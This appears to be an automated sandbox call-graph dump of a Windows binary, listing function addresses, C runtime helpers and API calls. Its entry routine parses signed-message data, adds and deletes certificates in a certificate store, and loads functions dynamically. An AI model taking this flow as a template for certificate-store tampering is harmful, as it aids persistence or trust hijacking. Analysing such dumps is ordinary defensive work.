f547f9 _free 15 API calls 6700->6702 6703 f59ceb 6702->6703 6722 f59d1a 6703->6722 6705 f59d0d _abort 6705->6694 6706->6698 6708 f55dfa 21 API calls 6707->6708 6711 f59ddd 6708->6711 6709 f59de3 6725 f55d69 6709->6725 6711->6709 6712 f55dfa 21 API calls 6711->6712 6721 f59e15 6711->6721 6717 f59e0c 6712->6717 6713 f55dfa 21 API calls 6714 f59e21 CloseHandle 6713->6714 6714->6709 6718 f59e2d GetLastError 6714->6718 6716 f59e5d 6716->6703 6720 f55dfa 21 API calls 6717->6720 6718->6709 6719 f547c3 __dosmaperr 15 API calls 6719->6716 6720->6721 6721->6709 6721->6713 6734 f55d46 LeaveCriticalSection 6722->6734 6724 f59d24 6724->6705 6726 f55ddf 6725->6726 6727 f55d78 6725->6727 6728 f547f9 _free 15 API calls 6726->6728 6727->6726 6732 f55da2 6727->6732 6729 f55de4 6728->6729 6730 f547e6 __dosmaperr 15 API calls 6729->6730 6731 f55dcf 6730->6731 6731->6716 6731->6719 6732->6731 6733 f55dc9 SetStdHandle 6732->6733 6733->6731 6734->6724 6735->6500 6736->6480 5951 f598c5 5952 f598ed 5951->5952 5953 f59925 5952->5953 5954 f59917 5952->5954 5955 f5991e 5952->5955 5956 f59997 16 API calls 5954->5956 5960 f59980 5955->5960 5958 f5991c 5956->5958 5961 f599a0 5960->5961 5962 f5a06f __startOneArgErrorHandling 16 API calls 5961->5962 5963 f59923 5962->5963 6059 f53d86 6060 f51f7d ___scrt_uninitialize_crt 7 API calls 6059->6060 6061 f53d8d 6060->6061 6185 f59146 IsProcessorFeaturePresent 6186 f53d41 6189 f5341b 6186->6189 6190 f5342a 6189->6190 6191 f53376 15 API calls 6190->6191 6192 f53444 6191->6192 6193 f53376 15 API calls 6192->6193 6194 f5344f 6193->6194 6737 f53400 6738 f53412 6737->6738 6739 f53418 6737->6739 6740 f53376 15 API calls 6738->6740 6740->6739 6741 f51e00 6742 f51e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6741->6742 6743 f51e9e _ValidateLocalCookies 6742->6743 6746 f52340 RtlUnwind 6742->6746 6745 f51f27 _ValidateLocalCookies 6746->6745 5964 f59ec3 5965 f59ecd 5964->5965 5966 f59ed9 5964->5966 5965->5966 5967 f59ed2 CloseHandle 5965->5967 5967->5966 6195 f51442 6196 f51a6a GetModuleHandleW 6195->6196 6197 f5144a 6196->6197 6198 f51480 6197->6198 6199 f5144e 6197->6199 6200 f53793 _abort 23 API calls 6198->6200 6201 f51459 6199->6201 6204 f53775 6199->6204 6202 f51488 6200->6202 6205 f5355e _abort 23 API calls 6204->6205 6206 f53780 6205->6206 6206->6201 5032 f5130d 5033 f51319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 f5162b 5033->5060 5035 f51320 5036 f51473 5035->5036 5044 f5134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5044 5112 f5191f IsProcessorFeaturePresent 5036->5112 5038 f5147a 5039 f51480 5038->5039 5116 f537e1 5038->5116 5119 f53793 5039->5119 5043 f51369 5044->5043 5051 f513ea 5044->5051 5097 f537a9 5044->5097 5068 f51a34 5051->5068 5052 f51405 5103 f51a6a GetModuleHandleW 5052->5103 5055 f51410 5056 f51419 5055->5056 5105 f53784 5055->5105 5108 f5179c 5056->5108 5061 f51634 5060->5061 5122 f51bd4 IsProcessorFeaturePresent 5061->5122 5065 f51645 5066 f51649 5065->5066 5132 f51f7d 5065->5132 5066->5035 5192 f520b0 5068->5192 5071 f513f0 5072 f53457 5071->5072 5194 f5522b 5072->5194 5074 f53460 5075 f513f8 5074->5075 5198 f555b6 5074->5198 5077 f51000 6 API calls 5075->5077 5078 f51096 CryptMsgGetParam 5077->5078 5079 f511e3 Sleep 5077->5079 5080 f51162 CryptMsgGetParam 5078->5080 5081 f510bc LocalAlloc 5078->5081 5082 f51215 CertCloseStore LocalFree LocalFree LocalFree 5079->5082 5088 f511f7 5079->5088 5080->5079 5085 f51174 CryptMsgGetParam 5080->5085 5083 f510d7 5081->5083 5084 f51156 LocalFree 5081->5084 5082->5052 5087 f510e0 LocalAlloc CryptMsgGetParam 5083->5087 5084->5080 5085->5079 5086 f51188 CertFindAttribute CertFindAttribute 5085->5086 5090 f511b5 LoadLibraryA GetProcAddress 5086->5090 5091 f511b1 5086->5091 5092 f51114 CertCreateCertificateContext 5087->5092 5093 f5113d LocalFree 5087->5093 5088->5082 5089 f5120a CertDeleteCertificateFromStore 5088->5089 5089->5088 5090->5079 5091->5079 5091->5090 5094 f51126 CertAddCertificateContextToStore 5092->5094 5095 f51133 CertFreeCertificateContext 5092->5095 5093->5087 5096 f5114d 5093->5096 5094->5095 5095->5093 5096->5084 5098 f537d1 _abort 5097->5098 5098->5051 5099 f54424 _abort 33 API calls 5098->5099 5100 f53e9a 5099->5100 5101 f53f24 _abort 33 API calls 5100->5101 5102 f53ec4 5101->5102 5104 f5140c 5103->5104 5104->5038 5104->5055 5686 f5355e 5105->5686 5107 f5378f 5107->5056 5110 f517a8 ___scrt_uninitialize_crt 5108->5110 5109 f51421 5109->5043 5110->5109 5111 f51f7d ___scrt_uninitialize_crt 7 API calls 5110->5111 5111->5109 5113 f51935 _abort 5112->5113 5114 f519e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 f51a24 _abort 5114->5115 5115->5038 5117 f5355e _abort 23 API calls 5116->5117 5118 f537f2 5117->5118 5118->5039 5120 f5355e _abort 23 API calls 5119->5120 5121 f51488 5120->5121 5123 f51640 5122->5123 5124 f51f5e 5123->5124 5138 f524b1 5124->5138 5127 f51f67 5127->5065 5129 f51f6f 5130 f51f7a 5129->5130 5152 f524ed 5129->5152 5130->5065 5133 f51f86 5132->5133 5134 f51f90 5132->5134 5135 f52496 ___vcrt_uninitialize_ptd 6 API calls 5133->5135 5134->5066 5136 f51f8b 5135->5136 5137 f524ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5134 5139 f524ba 5138->5139 5141 f524e3 5139->5141 5142 f51f63 5139->5142 5156 f5271d 5139->5156 5143 f524ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5143 5142->5127 5144 f52463 5142->5144 5143->5142 5173 f5262e 5144->5173 5147 f52478 5147->5129 5150 f52493 5150->5129 5153 f52517 5152->5153 5154 f524f8 5152->5154 5153->5127 5155 f52502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 f52543 5156->5161 5159 f52755 InitializeCriticalSectionAndSpinCount 5160 f52740 5159->5160 5160->5139 5162 f52564 5161->5162 5163 f52560 5161->5163 5162->5163 5165 f525cc GetProcAddress 5162->5165 5166 f525bd 5162->5166 5168 f525e3 LoadLibraryExW 5162->5168 5163->5159 5163->5160 5165->5163 5166->5165 5167 f525c5 FreeLibrary 5166->5167 5167->5165 5169 f5262a 5168->5169 5170 f525fa GetLastError 5168->5170 5169->5162 5170->5169 5171 f52605 ___vcrt_FlsSetValue 5170->5171 5171->5169 5172 f5261b LoadLibraryExW 5171->5172 5172->5162 5174 f52543 ___vcrt_FlsSetValue 5 API calls 5173->5174 5175 f52648 5174->5175 5176 f52661 TlsAlloc 5175->5176 5177 f5246d 5175->5177 5177->5147 5178 f526df 5177->5178 5179 f52543 ___vcrt_FlsSetValue 5 API calls 5178->5179 5180 f526f9 5179->5180 5181 f52714 TlsSetValue 5180->5181 5182 f52486 5180->5182 5181->5182 5182->5150 5183 f52496 5182->5183 5184 f524a0 5183->5184 5185 f524a6 5183->5185 5187 f52669 5184->5187 5185->5147 5188 f52543 ___vcrt_FlsSetValue 5 API calls 5187->5188 5189 f52683 5188->5189 5190 f5269b TlsFree 5189->5190 5191 f5268f 5189->5191 5190->5191 5191->5185 5193 f51a47 GetStartupInfoW 5192->5193 5193->5071 5195 f55234 5194->5195 5196 f5523d 5194->5196 5201 f5512a 5195->5201 5196->5074 5683 f5555d 5198->5683 5221 f54424 GetLastError 5201->5221 5203 f55137 5241 f55249 5203->5241 5205 f5513f 5250 f54ebe 5205->5250 5208 f55156 5208->5196 5211 f55199 5275 f54869 5211->5275 5214 f5518c 5215 f55194 5214->5215 5218 f551b1 5214->5218 5272 f547f9 5215->5272 5217 f551dd 5217->5211 5281 f54d94 5217->5281 5218->5217 5219 f54869 _free 15 API calls 5218->5219 5219->5217 5222 f54440 5221->5222 5223 f5443a 5221->5223 5228 f5448f SetLastError 5222->5228 5289 f5480c 5222->5289 5284 f55904 5223->5284 5227 f5445a 5230 f54869 _free 15 API calls 5227->5230 5228->5203 5232 f54460 5230->5232 5231 f5446f 5231->5227 5233 f54476 5231->5233 5234 f5449b SetLastError 5232->5234 5301 f54296 5233->5301 5306 f53f24 5234->5306 5239 f54869 _free 15 API calls 5240 f54488 5239->5240 5240->5228 5240->5234 5242 f55255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 f54424 _abort 33 API calls 5242->5243 5244 f5525f 5243->5244 5247 f552e3 _abort 5244->5247 5248 f53f24 _abort 33 API calls 5244->5248 5249 f54869 _free 15 API calls 5244->5249 5542 f556e2 EnterCriticalSection 5244->5542 5543 f552da 5244->5543 5247->5205 5248->5244 5249->5244 5547 f53f72 5250->5547 5253 f54ef1 5255 f54ef6 GetACP 5253->5255 5256 f54f08 5253->5256 5254 f54edf GetOEMCP 5254->5256 5255->5256 5256->5208 5257 f562ff 5256->5257 5258 f5633d 5257->5258 5259 f5630d _abort 5257->5259 5260 f547f9 _free 15 API calls 5258->5260 5259->5258 5261 f56328 HeapAlloc 5259->5261 5263 f56992 _abort 2 API calls 5259->5263 5262 f55167 5260->5262 5261->5259 5261->5262 5262->5211 5264 f552eb 5262->5264 5263->5259 5265 f54ebe 35 API calls 5264->5265 5266 f5530a 5265->5266 5267 f5535b IsValidCodePage 5266->5267 5269 f55311 _ValidateLocalCookies 5266->5269 5271 f55380 _abort 5266->5271 5268 f5536d GetCPInfo 5267->5268 5267->5269 5268->5269 5268->5271 5269->5214 5584 f54f96 GetCPInfo 5271->5584 5273 f544a8 _free 15 API calls 5272->5273 5274 f547fe 5273->5274 5274->5211 5276 f54874 HeapFree 5275->5276 5277 f5489d _free 5275->5277 5276->5277 5278 f54889 5276->5278 5277->5208 5279 f547f9 _free 13 API calls 5278->5279 5280 f5488f GetLastError 5279->5280 5280->5277 5647 f54d51 5281->5647 5283 f54db8 5283->5211 5317 f55741 5284->5317 5286 f5592b 5287 f55943 TlsGetValue 5286->5287 5288 f55937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5222 5294 f54819 _abort 5289->5294 5290 f54844 HeapAlloc 5292 f54452 5290->5292 5290->5294 5291 f54859 5293 f547f9 _free 14 API calls 5291->5293 5292->5227 5296 f5595a 5292->5296 5293->5292 5294->5290 5294->5291 5330 f56992 5294->5330 5297 f55741 _abort 5 API calls 5296->5297 5298 f55981 5297->5298 5299 f5599c TlsSetValue 5298->5299 5300 f55990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5231 5344 f5426e 5301->5344 5452 f56b14 5306->5452 5309 f53f35 5311 f53f3e IsProcessorFeaturePresent 5309->5311 5316 f53f5c 5309->5316 5312 f53f49 5311->5312 5480 f54573 5312->5480 5313 f53793 _abort 23 API calls 5315 f53f66 5313->5315 5316->5313 5318 f55771 _abort 5317->5318 5319 f5576d 5317->5319 5318->5286 5319->5318 5321 f55791 5319->5321 5323 f557dd 5319->5323 5321->5318 5322 f5579d GetProcAddress 5321->5322 5322->5318 5324 f557fe LoadLibraryExW 5323->5324 5327 f557f3 5323->5327 5325 f55833 5324->5325 5326 f5581b GetLastError 5324->5326 5325->5327 5328 f5584a FreeLibrary 5325->5328 5326->5325 5329 f55826 LoadLibraryExW 5326->5329 5327->5319 5328->5327 5329->5325 5333 f569d6 5330->5333 5332 f569a8 _ValidateLocalCookies 5332->5294 5334 f569e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 f556e2 EnterCriticalSection 5334->5339 5336 f569ed 5340 f56a1f 5336->5340 5338 f56a14 _abort 5338->5332 5339->5336 5343 f5572a LeaveCriticalSection 5340->5343 5342 f56a26 5342->5338 5343->5342 5350 f541ae 5344->5350 5346 f54292 5347 f5421e 5346->5347 5361 f540b2 5347->5361 5349 f54242 5349->5239 5351 f541ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 f556e2 EnterCriticalSection 5351->5356 5353 f541c4 5357 f541ea 5353->5357 5355 f541e2 _abort 5355->5346 5356->5353 5360 f5572a LeaveCriticalSection 5357->5360 5359 f541f4 5359->5355 5360->5359 5362 f540be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 f556e2 EnterCriticalSection 5362->5369 5364 f540c8 5370 f543d9 5364->5370 5366 f540e0 5374 f540f6 5366->5374 5368 f540ee _abort 5368->5349 5369->5364 5371 f5440f __fassign 5370->5371 5372 f543e8 __fassign 5370->5372 5371->5366 5372->5371 5377 f56507 5372->5377 5451 f5572a LeaveCriticalSection 5374->5451 5376 f54100 5376->5368 5379 f56587 5377->5379 5380 f5651d 5377->5380 5381 f54869 _free 15 API calls 5379->5381 5404 f565d5 5379->5404 5380->5379 5385 f54869 _free 15 API calls 5380->5385 5387 f56550 5380->5387 5382 f565a9 5381->5382 5383 f54869 _free 15 API calls 5382->5383 5388 f565bc 5383->5388 5384 f54869 _free 15 API calls 5389 f5657c 5384->5389 5391 f56545 5385->5391 5386 f565e3 5390 f56643 5386->5390 5401 f54869 15 API calls _free 5386->5401 5392 f54869 _free 15 API calls 5387->5392 5403 f56572 5387->5403 5393 f54869 _free 15 API calls 5388->5393 5394 f54869 _free 15 API calls 5389->5394 5395 f54869 _free 15 API calls 5390->5395 5405 f56078 5391->5405 5397 f56567 5392->5397 5398 f565ca 5393->5398 5394->5379 5402 f56649 5395->5402 5433 f56176 5397->5433 5400 f54869 _free 15 API calls 5398->5400 5400->5404 5401->5386 5402->5371 5403->5384 5445 f5667a 5404->5445 5406 f56089 5405->5406 5432 f56172 5405->5432 5407 f5609a 5406->5407 5408 f54869 _free 15 API calls 5406->5408 5409 f560ac 5407->5409 5410 f54869 _free 15 API calls 5407->5410 5408->5407 5411 f54869 _free 15 API calls 5409->5411 5415 f560be 5409->5415 5410->5409 5411->5415 5412 f54869 _free 15 API calls 5414 f560d0 5412->5414 5413 f560e2 5417 f560f4 5413->5417 5418 f54869 _free 15 API calls 5413->5418 5414->5413 5416 f54869 _free 15 API calls 5414->5416 5415->5412 5415->5414 5416->5413 5419 f56106 5417->5419 5421 f54869 _free 15 API calls 5417->5421 5418->5417 5420 f56118 5419->5420 5422 f54869 _free 15 API calls 5419->5422 5423 f5612a 5420->5423 5424 f54869 _free 15 API calls 5420->5424 5421->5419 5422->5420 5425 f5613c 5423->5425 5426 f54869 _free 15 API calls 5423->5426 5424->5423 5427 f5614e 5425->5427 5429 f54869 _free 15 API calls 5425->5429 5426->5425 5428 f56160 5427->5428 5430 f54869 _free 15 API calls 5427->5430 5431 f54869 _free 15 API calls 5428->5431 5428->5432 5429->5427 5430->5428 5431->5432 5432->5387 5434 f56183 5433->5434 5435 f561db 5433->5435 5436 f56193 5434->5436 5437 f54869 _free 15 API calls 5434->5437 5435->5403 5438 f561a5 5436->5438 5439 f54869 _free 15 API calls 5436->5439 5437->5436 5440 f561b7 5438->5440 5441 f54869 _free 15 API calls 5438->5441 5439->5438 5442 f561c9 5440->5442 5443 f54869 _free 15 API calls 5440->5443 5441->5440 5442->5435 5444 f54869 _free 15 API calls 5442->5444 5443->5442 5444->5435 5446 f56687 5445->5446 5450 f566a5 5445->5450 5447 f5621b __fassign 15 API calls 5446->5447 5446->5450 5448 f5669f 5447->5448 5449 f54869 _free 15 API calls 5448->5449 5449->5450 5450->5386 5451->5376 5484 f56a82 5452->5484 5455 f56b6f 5456 f56b7b _abort 5455->5456 5457 f56ba2 _abort 5456->5457 5462 f56ba8 _abort 5456->5462 5498 f544a8 GetLastError 5456->5498 5459 f56bf4 5457->5459 5457->5462 5465 f56bd7 _abort 5457->5465 5460 f547f9 _free 15 API calls 5459->5460 5461 f56bf9 5460->5461 5517 f5473d 5461->5517 5466 f56c20 5462->5466 5520 f556e2 EnterCriticalSection 5462->5520 5465->5309 5468 f56c7f 5466->5468 5469 f56c77 5466->5469 5477 f56caa 5466->5477 5521 f5572a LeaveCriticalSection 5466->5521 5468->5477 5522 f56b66 5468->5522 5472 f53793 _abort 23 API calls 5469->5472 5472->5468 5474 f54424 _abort 33 API calls 5478 f56d0d 5474->5478 5476 f56b66 _abort 33 API calls 5476->5477 5525 f56d2f 5477->5525 5478->5465 5479 f54424 _abort 33 API calls 5478->5479 5479->5465 5481 f5458f _abort 5480->5481 5482 f545bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 f5468c _abort _ValidateLocalCookies 5482->5483 5483->5316 5487 f56a28 5484->5487 5486 f53f29 5486->5309 5486->5455 5488 f56a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 f556e2 EnterCriticalSection 5488->5493 5490 f56a42 5494 f56a76 5490->5494 5492 f56a69 _abort 5492->5486 5493->5490 5497 f5572a LeaveCriticalSection 5494->5497 5496 f56a80 5496->5492 5497->5496 5499 f544c1 5498->5499 5500 f544c7 5498->5500 5501 f55904 _abort 6 API calls 5499->5501 5502 f5480c _abort 12 API calls 5500->5502 5504 f5451e SetLastError 5500->5504 5501->5500 5503 f544d9 5502->5503 5505 f5595a _abort 6 API calls 5503->5505 5511 f544e1 5503->5511 5506 f54527 5504->5506 5507 f544f6 5505->5507 5506->5457 5510 f544fd 5507->5510 5507->5511 5508 f54869 _free 12 API calls 5509 f544e7 5508->5509 5512 f54515 SetLastError 5509->5512 5513 f54296 _abort 12 API calls 5510->5513 5511->5508 5512->5506 5514 f54508 5513->5514 5515 f54869 _free 12 API calls 5514->5515 5516 f5450e 5515->5516 5516->5504 5516->5512 5529 f546c2 5517->5529 5519 f54749 5519->5465 5520->5466 5521->5469 5523 f54424 _abort 33 API calls 5522->5523 5524 f56b6b 5523->5524 5524->5476 5526 f56d35 5525->5526 5527 f56cfe 5525->5527 5541 f5572a LeaveCriticalSection 5526->5541 5527->5465 5527->5474 5527->5478 5530 f544a8 _free 15 API calls 5529->5530 5531 f546d8 5530->5531 5532 f546e6 _ValidateLocalCookies 5531->5532 5537 f5474d IsProcessorFeaturePresent 5531->5537 5532->5519 5534 f5473c 5535 f546c2 _abort 21 API calls 5534->5535 5536 f54749 5535->5536 5536->5519 5538 f54758 5537->5538 5539 f54573 _abort 3 API calls 5538->5539 5540 f5476d GetCurrentProcess TerminateProcess 5539->5540 5540->5534 5541->5527 5542->5244 5546 f5572a LeaveCriticalSection 5543->5546 5545 f552e1 5545->5244 5546->5545 5548 f53f8f 5547->5548 5554 f53f85 5547->5554 5549 f54424 _abort 33 API calls 5548->5549 5548->5554 5550 f53fb0 5549->5550 5555 f572d1 5550->5555 5554->5253 5554->5254 5556 f572e4 5555->5556 5557 f53fc9 5555->5557 5556->5557 5563 f56754 5556->5563 5559 f572fe 5557->5559 5560 f57311 5559->5560 5561 f57326 5559->5561 5560->5561 5562 f55249 __fassign 33 API calls 5560->5562 5561->5554 5562->5561 5564 f56760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 f54424 _abort 33 API calls 5564->5565 5566 f56769 5565->5566 5567 f567b7 _abort 5566->5567 5575 f556e2 EnterCriticalSection 5566->5575 5567->5557 5569 f56787 5576 f567cb 5569->5576 5574 f53f24 _abort 33 API calls 5574->5567 5575->5569 5577 f567d9 __fassign 5576->5577 5579 f5679b 5576->5579 5578 f56507 __fassign 15 API calls 5577->5578 5577->5579 5578->5579 5580 f567ba 5579->5580 5583 f5572a LeaveCriticalSection 5580->5583 5582 f567ae 5582->5567 5582->5574 5583->5582 5588 f54fd0 5584->5588 5591 f5507a _ValidateLocalCookies 5584->5591 5586 f55031 5604 f57cd1 5586->5604 5592 f5634d 5588->5592 5590 f57cd1 38 API calls 5590->5591 5591->5269 5593 f53f72 __fassign 33 API calls 5592->5593 5594 f5636d MultiByteToWideChar 5593->5594 5596 f563ab 5594->5596 5599 f56443 _ValidateLocalCookies 5594->5599 5598 f562ff 16 API calls 5596->5598 5601 f563cc _abort __alloca_probe_16 5596->5601 5597 f5643d 5609 f5646a 5597->5609 5598->5601 5599->5586 5601->5597 5602 f56411 MultiByteToWideChar 5601->5602 5602->5597 5603 f5642d GetStringTypeW 5602->5603 5603->5597 5605 f53f72 __fassign 33 API calls 5604->5605 5606 f57ce4 5605->5606 5613 f57ab4 5606->5613 5608 f55052 5608->5590 5610 f56476 5609->5610 5611 f56487 5609->5611 5610->5611 5612 f54869 _free 15 API calls 5610->5612 5611->5599 5612->5611 5614 f57acf 5613->5614 5615 f57af5 MultiByteToWideChar 5614->5615 5616 f57ca9 _ValidateLocalCookies 5615->5616 5617 f57b1f 5615->5617 5616->5608 5618 f562ff 16 API calls 5617->5618 5621 f57b40 __alloca_probe_16 5617->5621 5618->5621 5619 f57bf5 5624 f5646a __freea 15 API calls 5619->5624 5620 f57b89 MultiByteToWideChar 5620->5619 5622 f57ba2 5620->5622 5621->5619 5621->5620 5638 f55a15 5622->5638 5624->5616 5625 f57bb9 5625->5619 5626 f57c04 5625->5626 5627 f57bcc 5625->5627 5628 f562ff 16 API calls 5626->5628 5633 f57c25 __alloca_probe_16 5626->5633 5627->5619 5630 f55a15 6 API calls 5627->5630 5628->5633 5629 f57c9a 5632 f5646a __freea 15 API calls 5629->5632 5630->5619 5631 f55a15 6 API calls 5634 f57c79 5631->5634 5632->5619 5633->5629 5633->5631 5634->5629 5635 f57c88 WideCharToMultiByte 5634->5635 5635->5629 5636 f57cc8 5635->5636 5637 f5646a __freea 15 API calls 5636->5637 5637->5619 5639 f55741 _abort 5 API calls 5638->5639 5640 f55a3c 5639->5640 5643 f55a45 _ValidateLocalCookies 5640->5643 5644 f55a9d 5640->5644 5642 f55a85 LCMapStringW 5642->5643 5643->5625 5645 f55741 _abort 5 API calls 5644->5645 5646 f55ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 f54d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 f556e2 EnterCriticalSection 5648->5655 5650 f54d67 5656 f54dbc 5650->5656 5654 f54d80 _abort 5654->5283 5655->5650 5668 f554dc 5656->5668 5658 f54e0a 5659 f554dc 21 API calls 5658->5659 5660 f54e26 5659->5660 5661 f554dc 21 API calls 5660->5661 5662 f54e44 5661->5662 5663 f54869 _free 15 API calls 5662->5663 5664 f54d74 5662->5664 5663->5664 5665 f54d88 5664->5665 5682 f5572a LeaveCriticalSection 5665->5682 5667 f54d92 5667->5654 5669 f554ed 5668->5669 5677 f554e9 5668->5677 5670 f554f4 5669->5670 5672 f55507 _abort 5669->5672 5671 f547f9 _free 15 API calls 5670->5671 5673 f554f9 5671->5673 5675 f55535 5672->5675 5676 f5553e 5672->5676 5672->5677 5674 f5473d _abort 21 API calls 5673->5674 5674->5677 5678 f547f9 _free 15 API calls 5675->5678 5676->5677 5680 f547f9 _free 15 API calls 5676->5680 5677->5658 5679 f5553a 5678->5679 5681 f5473d _abort 21 API calls 5679->5681 5680->5679 5681->5677 5682->5667 5684 f53f72 __fassign 33 API calls 5683->5684 5685 f55571 5684->5685 5685->5074 5687 f5356a _abort 5686->5687 5688 f53582 5687->5688 5701 f536b8 GetModuleHandleW 5687->5701 5708 f556e2 EnterCriticalSection 5688->5708 5695 f5358a 5700 f535ff _abort 5695->5700 5709 f53c97 5695->5709 5698 f53671 _abort 5698->5107 5712 f53668 5700->5712 5702 f53576 5701->5702 5702->5688 5703 f536fc GetModuleHandleExW 5702->5703 5704 f53726 GetProcAddress 5703->5704 5705 f5373b 5703->5705 5704->5705 5706 f5374f FreeLibrary 5705->5706 5707 f53758 _ValidateLocalCookies 5705->5707 5706->5707 5707->5688 5708->5695 5723 f539d0 5709->5723 5743 f5572a LeaveCriticalSection 5712->5743 5714 f53641 5714->5698 5715 f53677 5714->5715 5744 f55b1f 5715->5744 5717 f53681 5718 f536a5 5717->5718 5719 f53685 GetPEB 5717->5719 5721 f536fc _abort 3 API calls 5718->5721 5719->5718 5720 f53695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 f536ad ExitProcess 5721->5722 5726 f5397f 5723->5726 5725 f539f4 5725->5700 5727 f5398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 f556e2 EnterCriticalSection 5727->5734 5729 f53999 5735 f53a20 5729->5735 5731 f539a6 5739 f539c4 5731->5739 5733 f539b7 _abort 5733->5725 5734->5729 5736 f53a48 5735->5736 5738 f53a40 _ValidateLocalCookies 5735->5738 5737 f54869 _free 15 API calls 5736->5737 5736->5738 5737->5738 5738->5731 5742 f5572a LeaveCriticalSection 5739->5742 5741 f539ce 5741->5733 5742->5741 5743->5714 5745 f55b44 5744->5745 5747 f55b3a _ValidateLocalCookies 5744->5747 5746 f55741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6207 f5324d 6208 f5522b 46 API calls 6207->6208 6209 f5325f 6208->6209 6218 f5561e GetEnvironmentStringsW 6209->6218 6212 f5326a 6214 f54869 _free 15 API calls 6212->6214 6215 f5329f 6214->6215 6216 f53275 6217 f54869 _free 15 API calls 6216->6217 6217->6212 6219 f55635 6218->6219 6229 f55688 6218->6229 6222 f5563b WideCharToMultiByte 6219->6222 6220 f55691 FreeEnvironmentStringsW 6221 f53264 6220->6221 6221->6212 6230 f532a5 6221->6230 6223 f55657 6222->6223 6222->6229 6224 f562ff 16 API calls 6223->6224 6225 f5565d 6224->6225 6226 f55664 WideCharToMultiByte 6225->6226 6227 f5567a 6225->6227 6226->6227 6228 f54869 _free 15 API calls 6227->6228 6228->6229 6229->6220 6229->6221 6231 f532ba 6230->6231 6232 f5480c _abort 15 API calls 6231->6232 6234 f532e1 6232->6234 6233 f53345 6235 f54869 _free 15 API calls 6233->6235 6234->6233 6237 f5480c _abort 15 API calls 6234->6237 6238 f53347 6234->6238 6242 f53369 6234->6242 6245 f54869 _free 15 API calls 6234->6245 6247 f53eca 6234->6247 6236 f5335f 6235->6236 6236->6216 6237->6234 6240 f53376 15 API calls 6238->6240 6241 f5334d 6240->6241 6243 f54869 _free 15 API calls 6241->6243 6244 f5474d _abort 6 API calls 6242->6244 6243->6233 6246 f53375 6244->6246 6245->6234 6248 f53ed7 6247->6248 6249 f53ee5 6247->6249 6248->6249 6254 f53efc 6248->6254 6250 f547f9 _free 15 API calls 6249->6250 6251 f53eed 6250->6251 6252 f5473d _abort 21 API calls 6251->6252 6253 f53ef7 6252->6253 6253->6234 6254->6253 6255 f547f9 _free 15 API calls 6254->6255 6255->6251 6062 f53d8f 6063 f53d9e 6062->6063 6064 f53db2 6062->6064 6063->6064 6066 f54869 _free 15 API calls 6063->6066 6065 f54869 _free 15 API calls 6064->6065 6067 f53dc4 6065->6067 6066->6064 6068 f54869 _free 15 API calls 6067->6068 6069 f53dd7 6068->6069 6070 f54869 _free 15 API calls 6069->6070 6071 f53de8 6070->6071 6072 f54869 _free 15 API calls 6071->6072 6073 f53df9 6072->6073 6747 f5430f 6748 f5432a 6747->6748 6749 f5431a 6747->6749 6753 f54330 6749->6753 6752 f54869 _free 15 API calls 6752->6748 6754 f54343 6753->6754 6755 f54349 6753->6755 6756 f54869 _free 15 API calls 6754->6756 6757 f54869 _free 15 API calls 6755->6757 6756->6755 6758 f54355 6757->6758 6759 f54869 _free 15 API calls 6758->6759 6760 f54360 6759->6760 6761 f54869 _free 15 API calls 6760->6761 6762 f5436b 6761->6762 6763 f54869 _free 15 API calls 6762->6763 6764 f54376 6763->6764 6765 f54869 _free 15 API calls 6764->6765 6766 f54381 6765->6766 6767 f54869 _free 15 API calls 6766->6767 6768 f5438c 6767->6768 6769 f54869 _free 15 API calls 6768->6769 6770 f54397 6769->6770 6771 f54869 _free 15 API calls 6770->6771 6772 f543a2 6771->6772 6773 f54869 _free 15 API calls 6772->6773 6774 f543b0 6773->6774 6779 f541f6 6774->6779 6785 f54102 6779->6785 6781 f5421a 6782 f54246 6781->6782 6798 f54163 6782->6798 6784 f5426a 6784->6752 6786 f5410e ___scrt_is_nonwritable_in_current_image 6785->6786 6793 f556e2 EnterCriticalSection 6786->6793 6788 f54142 6794 f54157 6788->6794 6790 f54118 6790->6788 6791 f54869 _free 15 API calls 6790->6791 6791->6788 6792 f5414f _abort 6792->6781 6793->6790 6797 f5572a LeaveCriticalSection 6794->6797 6796 f54161 6796->6792 6797->6796 6799 f5416f ___scrt_is_nonwritable_in_current_image 6798->6799 6806 f556e2 EnterCriticalSection 6799->6806 6801 f54179 6802 f543d9 _abort 15 API calls 6801->6802 6803 f5418c 6802->6803 6807 f541a2 6803->6807 6805 f5419a _abort 6805->6784 6806->6801 6810 f5572a LeaveCriticalSection 6807->6810 6809 f541ac 6809->6805 6810->6809 5968 f555ce GetCommandLineA GetCommandLineW 6074 f51489 6077 f51853 6074->6077 6076 f5148e 6076->6076 6078 f51869 6077->6078 6080 f51872 6078->6080 6081 f51806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6078->6081 6080->6076 6081->6080 6256 f51248 6257 f51250 6256->6257 6273 f537f7 6257->6273 6259 f5125b 6280 f51664 6259->6280 6261 f5191f 4 API calls 6263 f512f2 6261->6263 6262 f51270 __RTC_Initialize 6271 f512cd 6262->6271 6286 f517f1 6262->6286 6265 f51289 6265->6271 6289 f518ab InitializeSListHead 6265->6289 6267 f5129f 6290 f518ba 6267->6290 6269 f512c2 6296 f53891 6269->6296 6271->6261 6272 f512ea 6271->6272 6274 f53806 6273->6274 6275 f53829 6273->6275 6274->6275 6276 f547f9 _free 15 API calls 